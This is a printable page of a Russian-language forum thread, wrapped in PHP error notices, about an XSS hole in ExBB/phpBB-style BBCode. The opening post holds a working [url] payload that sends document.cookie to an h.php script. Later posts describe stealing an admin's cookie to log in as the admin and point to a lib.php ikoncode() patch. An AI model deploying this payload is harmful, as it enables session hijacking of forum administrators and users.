Strict Standards: Resource ID#33 used as offset, casting to integer (33) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
Strict Standards: Resource ID#35 used as offset, casting to integer (35) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
Strict Standards: Resource ID#36 used as offset, casting to integer (36) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401 ТвойWeb :: Версия для печати :: Проблемы безопасности
[url="http://hacsoft.h14.ru/phpBB2"style="background:url(javascript:document.location='http://localhost/h.php?v='+escape(document.cookie));"]Проблемы?[/url]\n\n(Добавление)
Вопрос снят, эта дыра в этом форуме закрыта: это радует.
Зайдите вот сюда: http://exbb.h11.ru/forums
Раздел "Тестовый раздел" тема "Авторедерект". Если ее админы не удалят или что-то не поменяют, то после открытия этой темы вас перебросит на форум хаксофта \n\n(Добавление)
В IE это работает, а в Опере нет.
Я описал подробно метод взлома тут: http://hacsoft.h14.ru/phpBB2/viewtopic.php?t=63
Принцип: получаем cookie админа, а затем используем автовход на форум, подменив свои cookie на полученные и заходим под админом
Нет, дыру знаю, а как закрыть нет. Что тут непонятного? Дыры можно найти экспериментально методом перебора и анализа. А что бы закрыть надо копаться в скриптах форума или брать уже готовые патчи. Вот, что бы не копаться в скриптах и хочется узнать, где найти готовый патч
Aleksej
От таких дыр я выкладывал на ExBB заплатку. А в принципе можешь качнуть полный архив форума ExBB и взять из него файл lib.php.
если ты свой lib.php правил, то можешь взять только функцию ikoncode().
Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®
[Script Execution time: 0.0535] [ Gzipped ]
Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33